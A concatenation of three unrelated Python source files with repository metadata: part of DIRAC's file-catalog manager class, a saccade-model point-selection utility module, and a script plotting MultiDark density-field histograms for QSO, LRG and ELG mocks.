return S_OK({'Successful': successful, 'Failed': failed})
def setReplicaStatus(self, lfns, connection=False):
""" Set replica status in the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in lfns.items():
res = self._checkInfo(info, ['SE', 'Status'])
if not res['OK']:
failed[lfn] = res['Message']
continue
status = info['Status']
se = info['SE']
res = self._findFiles([lfn], ['FileID'], connection=connection)
if lfn not in res['Value']['Successful']:
failed[lfn] = res['Value']['Failed'][lfn]
continue
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setReplicaStatus(fileID, se, status, connection=connection)
if res['OK']:
successful[lfn] = res['Value']
else:
failed[lfn] = res['Message']
return S_OK({'Successful': successful, 'Failed': failed})
def setReplicaHost(self, lfns, connection=False):
""" Set replica host in the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in lfns.items():
res = self._checkInfo(info, ['SE', 'NewSE'])
if not res['OK']:
failed[lfn] = res['Message']
continue
newSE = info['NewSE']
se = info['SE']
res = self._findFiles([lfn], ['FileID'], connection=connection)
if lfn not in res['Value']['Successful']:
failed[lfn] = res['Value']['Failed'][lfn]
continue
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setReplicaHost(fileID, se, newSE, connection=connection)
if res['OK']:
successful[lfn] = res['Value']
else:
failed[lfn] = res['Message']
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# File read methods
#
def exists(self, lfns, connection=False):
""" Determine whether a file exists in the catalog """
connection = self._getConnection(connection)
res = self._findFiles(lfns, allStatus=True, connection=connection)
if not res['OK']:
return res
successful = res['Value']['Successful']
origFailed = res['Value']['Failed']
for lfn in successful:
successful[lfn] = lfn
failed = {}
if self.db.uniqueGUID:
guidList = []
val = None
# Try to identify if the GUID is given
# We consider only 2 options :
# either {lfn : guid}
# or { lfn : {PFN : .., GUID : ..} }
if isinstance(lfns, dict):
val = list(lfns.values())
# We have values, take the first to identify the type
if val:
val = val[0]
if isinstance(val, dict) and 'GUID' in val:
# We are in the case {lfn : {PFN:.., GUID:..}}
guidList = [lfns[lfn]['GUID'] for lfn in lfns]
elif isinstance(val, six.string_types):
# We hope that it is the GUID which is given
guidList = list(lfns.values())
if guidList:
# A dict { guid: lfn to which it is supposed to be associated }
guidToGivenLfn = dict(zip(guidList, lfns))
res = self.getLFNForGUID(guidList, connection)
if not res['OK']:
return res
guidLfns = res['Value']['Successful']
for guid, realLfn in guidLfns.items():
successful[guidToGivenLfn[guid]] = realLfn
for lfn, error in origFailed.items():
# It could be in successful because the guid exists with another lfn
if lfn in successful:
continue
if error == 'No such file or directory':
successful[lfn] = False
else:
failed[lfn] = error
return S_OK({"Successful": successful, "Failed": failed})
def isFile(self, lfns, connection=False):
""" Determine whether a path is a file in the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
return self.exists(lfns, connection=connection)
def getFileSize(self, lfns, connection=False):
""" Get file size from the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
res = self._findFiles(lfns, ['Size'], connection=connection)
if not res['OK']:
return res
totalSize = 0
for lfn in res['Value']['Successful']:
size = res['Value']['Successful'][lfn]['Size']
res['Value']['Successful'][lfn] = size
totalSize += size
res['TotalSize'] = totalSize
return res
def getFileMetadata(self, lfns, connection=False):
""" Get file metadata from the catalog """
connection = self._getConnection(connection)
# TO DO, should check whether it is a directory if it fails
return self._findFiles(lfns, ['Size', 'Checksum',
'ChecksumType', 'UID',
'GID', 'GUID',
'CreationDate', 'ModificationDate',
'Mode', 'Status'], connection=connection)
def getPathPermissions(self, paths, credDict, connection=False):
""" Get the permissions for the supplied paths """
connection = self._getConnection(connection)
res = self.db.ugManager.getUserAndGroupID(credDict)
if not res['OK']:
return res
uid, gid = res['Value']
res = self._findFiles(paths, metadata=['Mode', 'UID', 'GID'], connection=connection)
if not res['OK']:
return res
successful = {}
for dirName, dirDict in res['Value']['Successful'].items():
mode = dirDict['Mode']
p_uid = dirDict['UID']
p_gid = dirDict['GID']
successful[dirName] = {}
if p_uid == uid:
successful[dirName]['Read'] = mode & stat.S_IRUSR
successful[dirName]['Write'] = mode & stat.S_IWUSR
successful[dirName]['Execute'] = mode & stat.S_IXUSR
elif p_gid == gid:
successful[dirName]['Read'] = mode & stat.S_IRGRP
successful[dirName]['Write'] = mode & stat.S_IWGRP
successful[dirName]['Execute'] = mode & stat.S_IXGRP
else:
successful[dirName]['Read'] = mode & stat.S_IROTH
successful[dirName]['Write'] = mode & stat.S_IWOTH
successful[dirName]['Execute'] = mode & stat.S_IXOTH
return S_OK({'Successful': successful, 'Failed': res['Value']['Failed']})
######################################################
#
# Replica read methods
#
def __getReplicasForIDs(self, fileIDLfnDict, allStatus, connection=False):
""" Get replicas for files with already resolved IDs
"""
replicas = {}
if fileIDLfnDict:
fields = []
if not self.db.lfnPfnConvention or self.db.lfnPfnConvention == "Weak":
fields = ['PFN']
res = self._getFileReplicas(list(fileIDLfnDict), fields_input=fields,
allStatus=allStatus, connection=connection)
if not res['OK']:
return res
for fileID, seDict in res['Value'].items():
lfn = fileIDLfnDict[fileID]
replicas[lfn] = {}
for se, repDict in seDict.items():
pfn = repDict.get('PFN', '')
replicas[lfn][se] = pfn
result = S_OK(replicas)
return result
def getReplicas(self, lfns, allStatus, connection=False):
""" Get file replicas from the catalog """
connection = self._getConnection(connection)
# Get FileID <-> LFN correspondence first
res = self._findFileIDs(lfns, connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
fileIDLFNs = {}
for lfn, fileID in res['Value']['Successful'].items():
fileIDLFNs[fileID] = lfn
result = self.__getReplicasForIDs(fileIDLFNs, allStatus, connection)
if not result['OK']:
return result
replicas = result['Value']
return S_OK({"Successful": replicas, 'Failed': failed})
def getReplicasByMetadata(self, metaDict, path, allStatus, credDict, connection=False):
""" Get file replicas for files corresponding to the given metadata """
connection = self._getConnection(connection)
# Get FileID <-> LFN correspondence first
failed = {}
result = self.db.fmeta.findFilesByMetadata(metaDict, path, credDict)
if not result['OK']:
return result
idLfnDict = result['Value']
result = self.__getReplicasForIDs(idLfnDict, allStatus, connection)
if not result['OK']:
return result
replicas = result['Value']
return S_OK({"Successful": replicas, 'Failed': failed})
def getReplicaStatus(self, lfns, connection=False):
""" Get replica status from the catalog """
connection = self._getConnection(connection)
res = self._findFiles(lfns, connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
fileIDLFNs = {}
for lfn, fileDict in res['Value']['Successful'].items():
fileID = fileDict['FileID']
fileIDLFNs[fileID] = lfn
successful = {}
if fileIDLFNs:
res = self._getFileReplicas(list(fileIDLFNs), allStatus=True, connection=connection)
if not res['OK']:
return res
for fileID, seDict in res['Value'].items():
lfn = fileIDLFNs[fileID]
requestedSE = lfns[lfn]
if not requestedSE:
failed[lfn] = "Replica info not supplied"
elif requestedSE not in seDict:
failed[lfn] = "No replica at supplied site"
else:
successful[lfn] = seDict[requestedSE]['Status']
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# General usage methods
#
def _getStatusInt(self, status, connection=False):
connection = self._getConnection(connection)
req = "SELECT StatusID FROM FC_Statuses WHERE Status = '%s';" % status
res = self.db._query(req, connection)
if not res['OK']:
return res
if res['Value']:
return S_OK(res['Value'][0][0])
req = "INSERT INTO FC_Statuses (Status) VALUES ('%s');" % status
res = self.db._update(req, connection)
if not res['OK']:
return res
return S_OK(res['lastRowId'])
def _getIntStatus(self, statusID, connection=False):
if statusID in self.statusDict:
return S_OK(self.statusDict[statusID])
connection = self._getConnection(connection)
req = "SELECT StatusID,Status FROM FC_Statuses"
res = self.db._query(req, connection)
if not res['OK']:
return res
if res['Value']:
for row in res['Value']:
self.statusDict[int(row[0])] = row[1]
if statusID in self.statusDict:
return S_OK(self.statusDict[statusID])
return S_OK('Unknown')
def getFileIDsInDirectory(self, dirID, requestString=False):
""" Get a list of IDs for all the files stored in given directories or their
subdirectories
:param dirID: single directory ID or a list of directory IDs
:type dirID: int or python:list[int]
:param bool requestString: if True return result as a SQL SELECT string
:return: list of file IDs or SELECT string
"""
return self._getDirectoryFileIDs(dirID, requestString=requestString)
def getFilesInDirectory(self, dirID, verbose=False, connection=False):
connection = self._getConnection(connection)
files = {}
res = self._getDirectoryFiles(dirID, [], ['FileID', 'Size', 'GUID',
'Checksum', 'ChecksumType',
'Type', 'UID',
'GID', 'CreationDate',
'ModificationDate', 'Mode',
'Status'], connection=connection)
if not res['OK']:
return res
if not res['Value']:
return S_OK(files)
fileIDNames = {}
for fileName, fileDict in res['Value'].items():
files[fileName] = {}
files[fileName]['MetaData'] = fileDict
fileIDNames[fileDict['FileID']] = fileName
if verbose:
result = self._getFileReplicas(list(fileIDNames), connection=connection)
if not result['OK']:
return result
for fileID, seDict in result['Value'].items():
fileName = fileIDNames[fileID]
files[fileName]['Replicas'] = seDict
return S_OK(files)
def getDirectoryReplicas(self, dirID, path, allStatus=False, connection=False):
""" Get the replicas for all the Files in the given Directory
:param int dirID: ID of the directory
:param unused path: useless
:param bool allStatus: whether all replicas and file status are considered
If False, take the visibleFileStatus and visibleReplicaStatus values from the configuration
"""
connection = self._getConnection(connection)
result = self._getDirectoryReplicas(dirID, allStatus, connection)
if not result['OK']:
return result
resultDict = {}
seDict = {}
for fileName, fileID, seID, pfn in result['Value']:
resultDict.setdefault(fileName, {})
if seID not in seDict:
res = self.db.seManager.getSEName(seID)
if not res['OK']:
seDict[seID] = 'Unknown'
else:
seDict[seID] = res['Value']
se = seDict[seID]
resultDict[fileName][se] = pfn
return S_OK(resultDict)
def _getFileDirectories(self, lfns):
""" For a list of lfn, returns a dictionary with key the directory, and value
the files in that directory. It does not make any query, just splits the names
:param lfns: list of lfns
:type lfns: python:list
"""
dirDict = {}
for lfn in lfns:
lfnDir = os.path.dirname(lfn)
lfnFile = os.path.basename(lfn)
dirDict.setdefault(lfnDir, [])
dirDict[lfnDir].append(lfnFile)
return dirDict
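# Purely illustrative example of the splitting done above (paths are made up):
# _getFileDirectories(['/vo/data/a.txt', '/vo/data/b.txt', '/vo/log/c.txt'])
# -> {'/vo/data': ['a.txt', 'b.txt'], '/vo/log': ['c.txt']}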
def _checkInfo(self, info, requiredKeys):
if not info:
return S_ERROR("Missing parameters")
for key in requiredKeys:
if key not in info:
return S_ERROR("Missing '%s' parameter" % key)
return S_OK()
# def _checkLFNPFNConvention( self, lfn, pfn, se ):
# """ Check that the PFN corresponds to the LFN-PFN convention """
# if pfn == lfn:
# return S_OK()
# if ( len( pfn ) < len( lfn ) ) or ( pfn[-len( lfn ):] != lfn ) :
# return S_ERROR( 'PFN does not correspond to the LFN convention' )
# return S_OK()
def changeFileGroup(self, lfns):
""" Get set the group for the supplied files
:param lfns: dictionary < lfn : group >
:param int/str newGroup: optional new group/groupID the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'GID'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
group = lfns[lfn]
if isinstance(group, six.string_types):
groupRes = self.db.ugManager.findGroup(group)
if not groupRes['OK']:
return groupRes
group = groupRes['Value']
currentGroup = res['Value']['Successful'][lfn]['GID']
if int(group) == int(currentGroup):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "GID", group)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def changeFileOwner(self, lfns):
""" Set the owner for the supplied files
:param lfns: dictionary < lfn : owner >
:param int/str newOwner: optional new user/userID the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'UID'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
owner = lfns[lfn]
if isinstance(owner, six.string_types):
userRes = self.db.ugManager.findUser(owner)
if not userRes['OK']:
return userRes
owner = userRes['Value']
currentOwner = res['Value']['Successful'][lfn]['UID']
if int(owner) == int(currentOwner):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "UID", owner)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def changeFileMode(self, lfns):
"""" Set the mode for the supplied files
:param lfns: dictionary < lfn : mode >
:param int newMode: optional new mode the same for all the supplied lfns
"""
res = self._findFiles(lfns, ['FileID', 'Mode'])
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
mode = lfns[lfn]
currentMode = res['Value']['Successful'][lfn]['Mode']
if int(currentMode) == int(mode):
successful[lfn] = True
else:
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "Mode", mode)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def setFileOwner(self, path, owner):
""" Set the file owner
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param owner: new user as a string or int uid
:type owner: str or int
"""
result = self.db.ugManager.findUser(owner)
if not result['OK']:
return result
uid = result['Value']
return self._setFileParameter(path, 'UID', uid)
def setFileGroup(self, path, gname):
""" Set the file group
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param gname: new group as a string or int gid
:type gname: str or int
"""
result = self.db.ugManager.findGroup(gname)
if not result['OK']:
return result
gid = result['Value']
return self._setFileParameter(path, 'GID', gid)
def setFileMode(self, path, mode):
""" Set the file mode
:param path: file path as a string or int or list of ints or select statement
:type path: str, int or python:list[int]
:param int mode: new mode
"""
return self._setFileParameter(path, 'Mode', mode)
def getSEDump(self, seName):
"""
Return all the files at a given SE, together with checksum and size
:param seName: name of the StorageElement
:returns: S_OK with list of tuples (lfn, checksum, size)
"""
return S_ERROR("To be implemented on derived class")
|
yujikato/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/FileManager/FileManagerBase.py
|
Python
|
gpl-3.0
| 48,207
|
[
"DIRAC"
] |
f5aff59dd7d6ab614c7ac83b06dfedc580f147c206e04660cac7fd854f7f3c8a
|
'''
Here we use two different concepts, times and indices:
Time t 0 1 2 3 4 5
| | | | | |
Vector [ 2 3 1 2 1 ]
| | | | |
Index i 0 1 2 3 4
'''
def select_points_before_time(X, t):
# Return points before given time index
return select_first_points(X, t)
def select_points_after_time(X, t):
# Return points after given time index.
return X[t:] # Python handles out of range cases by returning []
def select_first_points(X, n):
# Return first max n points of X.
return X[:n]
def select_last_points(X, n):
# Return last max n points of X
if n > 0:
return X[-n:]
else:
return []
def select_points_time_to_time(X, t1, t2):
# Return points according to the time interpretation of indices.
# Precondition: t1 <= t2 and t1,t2 >= 0.
# Return points from t1 to end, use .._to_time(X, t1, None)
return X[t1:t2] # Element at index t2 is excluded
def mean_point(X):
# Calculate mean of the points
sum_x = 0
sum_y = 0
for p in X:
sum_x += p[0]
sum_y += p[1]
n = len(X)
return [float(sum_x) / n, float(sum_y) / n]
def weighted_mean_point(X, W):
# Precondition: sum(W) = 1
sum_x = 0.0
sum_y = 0.0
for p, w in zip(X, W):
sum_x += w * p[0]
sum_y += w * p[1]
return [sum_x, sum_y]
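# Example (added for illustration): for X = [[0, 0], [2, 2]], mean_point(X)
# returns [1.0, 1.0]; with W = [0.25, 0.75] (summing to 1, as the precondition
# requires), weighted_mean_point(X, W) returns [1.5, 1.5].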
class TimePairValueHistory(object):
def __init__(self):
self._history = {}
self._min_value_t1 = -1
self._min_value_t2 = -1
self._min_value = float('inf')
self._min_value_data = None
def is_visited(self, t1, t2):
k1 = str(t1)
k2 = str(t2)
if k1 in self._history:
if k2 in self._history[k1]:
return True
return False
def is_minimal(self, t1, t2):
return t1 == self._min_value_t1 and t2 == self._min_value_t2
def visit(self, t1, t2, value, data):
'''
Return nothing
'''
if self.is_visited(t1, t2):
return
k1 = str(t1)
k2 = str(t2)
if k1 not in self._history:
self._history[k1] = {}
self._history[k1][k2] = True
if value < self._min_value:
self._min_value = value
self._min_value_t1 = t1
self._min_value_t2 = t2
self._min_value_data = data
def get_minimum(self):
'''
Return
(t1, t2, value) triple where the value is the minimal one.
'''
return (self._min_value_t1, self._min_value_t2,
self._min_value, self._min_value_data)
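# Minimal usage sketch of TimePairValueHistory (illustrative comment, not part
# of the original file): record visited (t1, t2) pairs with an error value and
# query the best pair seen so far.
#
#   history = TimePairValueHistory()
#   history.visit(0, 3, 2.5, None)
#   history.visit(1, 4, 1.75, None)
#   history.is_visited(1, 4)      # -> True
#   history.get_minimum()         # -> (1, 4, 1.75, None)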
| infant-cognition-tampere/saccademodel-py | saccademodel/utils.py | Python | mit | 2,622 | ["VisIt"] | 4b2c0c247cd3bf0f3854797250c8f90be5f13abe66ddbea80db20a67f698c5ca |
# cd pySU/pyMultidark/trunk/bin/fortranfile-0.2.1/
import sys
import numpy as n
import os
from os.path import join
from astropy.io import fits
import time
import cPickle
from scipy.interpolate import interp1d
from scipy.optimize import curve_fit
from scipy.stats import scoreatpercentile as sc
from scipy.stats import norm
import matplotlib.pyplot as p
from matplotlib.ticker import NullFormatter
nullfmt = NullFormatter() # no labels
from scipy.optimize import curve_fit
DFdir = join("/data2", "users", "gustavo", "BigMD", "1Gpc_3840_Planck1_New", "DENSFIELDS")
# mockDir = "/data1/DATA/eBOSS/Multidark-box-mocks/parts/"
mockDir = join("..","MD_1Gpc","density_field")
#inFiles = n.array(["dmdens_cic_104_DFhist.dat", "dmdens_cic_101_DFhist.dat", "dmdens_cic_097_DFhist.dat", "dmdens_cic_087_DFhist.dat"])
# inFiles = n.array(["dmdens_cic_104_DF0DF1hist.dat", "dmdens_cic_101_DF0DF1hist.dat", "dmdens_cic_097_DF0DF1hist.dat", "dmdens_cic_087_DF0DF1hist.dat"])
inFiles = n.array(["dmdens_cic_104_DFhist.dat", "dmdens_cic_101_DFhist.dat", "dmdens_cic_097_DFhist.dat", "dmdens_cic_087_DFhist.dat"])
# ZS = 0.7 0.8 1.0 1.48
bins = n.hstack((0,n.logspace(-3, 4, 1000)))
dx = bins[1:] - bins[:-1]
xb = (bins[1:]+bins[:-1])/2.
"""
ii=0
f=open(join(mockDir, inFiles[ii]))
bins, HDF0, HDF1, H = cPickle.load(f)
f.close()
X, Y = n.meshgrid(xb,xb)
N0 = HDF0 /dx / (1000.-2*1000./2048)**3.
N1 = HDF1 /dx / (1000.-2*1000./2048)**3.
inGal = n.array([ "Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.701838_nbar1.350000e-05_QSO.DF.fits.gz", "Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz" ])
"""
#################################################
#################################################
# delta - probability to have a galaxy relation
#################################################
#################################################
def getNN(inGalFile, bins = bins):
hd = fits.open(inGalFile)[1].data
Hqso, xedges, yedges = n.histogram2d(hd['DF'], hd['DF_N1'], bins)
HDF0qso = n.histogram(hd['DF'], bins= bins)[0] #n.logspace(-1.5,4,80))
HDF1qso = n.histogram(hd['DF_N1'], bins= bins)[0] #n.logspace(-1.5,4,80))
N0qso = HDF0qso /dx / 1000.**3.
N1qso = HDF1qso /dx / 1000.**3.
return Hqso, N0qso, N1qso
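# Normalisation note (comment added for clarity): histogram counts are divided
# by the bin width dx and by the box volume, so the N0*/N1* arrays are number
# densities per Mpc^3 per unit overdensity. For example, 1000 objects falling
# in a bin of width 0.5 inside a (1000 Mpc)^3 box give 1000 / 0.5 / 1e9 = 2e-6.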
def getNN0_sim(inSim):
f=open(join(mockDir, inSim))
bins, HDF0 = cPickle.load(f)
f.close()
#bins = n.hstack((0,n.logspace(-3, 4, 1000)))
xb = (bins[1:]+bins[:-1])/2.
dx = bins[1:] - bins[:-1]
X, Y = n.meshgrid(xb,xb)
N0 = HDF0 /dx / (1000.-2*1000./2048)**3.
return N0, bins
def getNN0(inGalFile, bins):
hd = fits.open(inGalFile)[1].data
HDF0, bins = n.histogram(hd['DF'], bins= bins) #n.logspace(-1.5,4,80))
dx = bins[1:] - bins[:-1]
N0 = HDF0 /dx / 1000.**3.
return N0, HDF0
"""
def smooth(Hin, ns=4, xb = (bins[1:]+bins[:-1])/2.):
n1, n2 = H.shape
nNew = int(float(n1)/ns)
print nNew
Hout = n.empty(( nNew, nNew ))
xout = n.empty((nNew))
for ii in n.arange(nNew):
idI = n.arange(ii*ns, (ii+1)*ns, 1)
xout[ii] = (xb[idI[-1]] + xb[idI[0]]) /2.
for jj in n.arange(nNew):
idJ = n.arange(jj*ns, (jj+1)*ns, 1)
idX, idY = n.meshgrid(idI,idJ)
Hout[ii, jj] = n.sum(n.array([Hin[n.hstack(idX)[kk], n.hstack(idY)[kk]] for kk in range(ns**2)]))
#print ii, jj
#print n.transpose([n.hstack(idX),n.hstack(idY)])
#print "-------------------------------------------------------------------"
return xout, Hout
"""
#################################################
#################################################
# density field order 0 : distribution
#################################################
#################################################
NR=10
N0z07s, binsz07s = getNN0_sim(inFiles[0])
N0z07 = n.array([N0z07s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07 = binsz07s[::NR]
N0z08s, binsz08s = getNN0_sim(inFiles[1])
N0z08 = n.array([N0z08s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08 = binsz08s[::NR]
N0z15s, binsz15s = getNN0_sim(inFiles[3])
N0z15 = n.array([N0z15s[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz15 = binsz15s[::NR]
bins = binsz07
xb = (bins[1:]+bins[:-1])/2.
dx = bins[1:] - bins[:-1]
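# Note on the rebinning idiom above (comment added for clarity): summing the
# NR interleaved slices arr[ii::NR] merges every NR consecutive histogram bins
# into one coarser bin, while bins[::NR] keeps every NR-th bin edge. This
# assumes the histogram length is divisible by NR. Toy example with NR = 2:
#   counts = n.array([1, 2, 3, 4])
#   n.array([counts[ii::2] for ii in range(2)]).sum(axis=0)   # -> array([3, 7])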
inGal = n.array([ "Box_HAM_z0.701838_nbar1.350000e-05_QSO.DF.fits.gz","Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z1.480160_nbar1.930000e-05_QSO.DF.fits.gz" ])
N0qsoz07, N0qsoz07T = getNN0(join( mockDir,inGal[0]), bins)
N0qsoz08, N0qsoz08T = getNN0(join( mockDir,inGal[1]), bins)
N0qsoz15, N0qsoz15T = getNN0(join( mockDir,inGal[2]), bins)
p.figure(0)
p.title('QSO')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0qsoz07,'ko', rasterized=True, label='z=0.7 qso')
p.plot(xb, N0qsoz08,'bo', rasterized=True, label='z=0.8 qso')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.plot(xb, N0z15,'rx', rasterized=True, label='z=1.5 all')
p.plot(xb, N0qsoz15,'ro', rasterized=True, label='z=1.5 qso')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-QSO-delta-HDF0.png"))
p.clf()
p.figure(0)
p.title('QSO')
p.plot(xb, N0qsoz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, N0qsoz08/N0z08,'bx', rasterized=True, label='z=0.8')
p.plot(xb, N0qsoz15/N0z15,'rx', rasterized=True, label='z=1.5')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10 , 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-QSO-delta-HDF0-ratio.png"))
p.clf()
inGal = n.array([ "Box_HAM_z0.701838_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.818843_nbar1.000000e-04_LRG.DF.fits.gz"])
N0lrgz07, N0lrgz07T = getNN0(join( mockDir,inGal[0]), bins)
N0lrgz08, N0lrgz08T = getNN0(join( mockDir,inGal[1]), bins)
p.figure(0)
p.title('LRG')
p.plot(xb, N0lrgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, N0lrgz08/N0z08,'bx', rasterized=True, label='z=0.8')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-LRG-delta-HDF0-ratio.png"))
p.clf()
p.figure(0)
p.title('LRG')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.plot(xb, N0lrgz07,'ko', rasterized=True, label='z=0.7 lrg')
p.plot(xb, N0lrgz08,'bo', rasterized=True, label='z=0.8 lrg')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-LRG-delta-HDF0.png"))
p.clf()
inGal = n.array([ "Box_HAM_z0.701838_nbar2.400000e-04_ELG.DF.fits.gz" , "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
N0elgz07, N0elgz07T = getNN0(join( mockDir,inGal[0]), bins)
N0elgz08, N0elgz08T = getNN0(join( mockDir,inGal[1]), bins)
p.figure(0)
p.title('ELG')
p.plot(xb, N0elgz07/N0z07,'kx', rasterized=True, label='z=0.7')
#p.plot(xb, N0elgz08/N0z08,'bx', rasterized=True, label='z=0.8')
#p.plot(xb[xb>1e2], 10**fun(n.log10(xb[xb>1e2]), prs[0],prs[1],prs[2]), 'r--', lw = 2, label='')
#p.plot(xb[xb<10**1.2], 10**fun(n.log10(xb[xb<10**1.2]), prsL[0],prsL[1],prsL[2]), 'r--', lw = 2)
#p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2)
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-ELG-delta-HDF0-ratio.png"))
p.clf()
p.figure(0)
p.title('ELG')
p.plot(xb, N0elgz07,'ko', rasterized=True, label='z=0.7 elg')
p.plot(xb, N0elgz08,'bo', rasterized=True, label='z=0.8 elg')
p.plot(xb, N0z07,'kx', rasterized=True, label='z=0.7 all')
p.plot(xb, N0z08,'bx', rasterized=True, label='z=0.8 all')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","evolution-ELG-delta-HDF0.png"))
p.clf()
########## FIT z=1.5 QSO
NR = 5
N0z15R = n.array([N0z15[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz15R = binsz15[::NR]
N0qsoz15R = n.array([N0qsoz15[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz15R_sig = n.array([N0qsoz15[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz15R[1:]+binsz15R[:-1])/2.
dxR = binsz15R[1:] - binsz15R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz15T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz15T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz15R_sig)
ok = (N0qsoz15>0)&(N0z15>0)&(N0qsoz15/N0z15>-6)#&(xb>10**2)
y = n.log10(N0qsoz15[ok]/N0z15[ok])
yplus = n.log10((N0qsoz15[ok] + errorsP(xb[ok])*N0qsoz15[ok] )/N0z15[ok])
yminus = n.log10((N0qsoz15[ok] - errorsP(xb[ok])*N0qsoz15[ok] )/N0z15[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
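# Fitting pattern used here and repeated for the other tracers/redshifts below
# (comment added for clarity): an 11th-degree polynomial is fitted to
# log10(N_tracer / N_all) as a function of log10(delta), with each bin weighted
# by the inverse relative Poisson error, i.e. w ~ sqrt(raw counts). Generic
# sketch with placeholder names (illustrative only):
#   mask = (dens_tracer > 0) & (dens_all > 0)
#   logx = n.log10(delta_centres[mask])
#   logy = n.log10(dens_tracer[mask] / dens_all[mask])
#   coeffs = n.polyfit(logx, logy, 11, w=counts_tracer[mask]**0.5)
#   model = 10 ** n.polyval(coeffs, logx)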
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz15/N0z15,'kx', rasterized=True, label='z=1.5')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
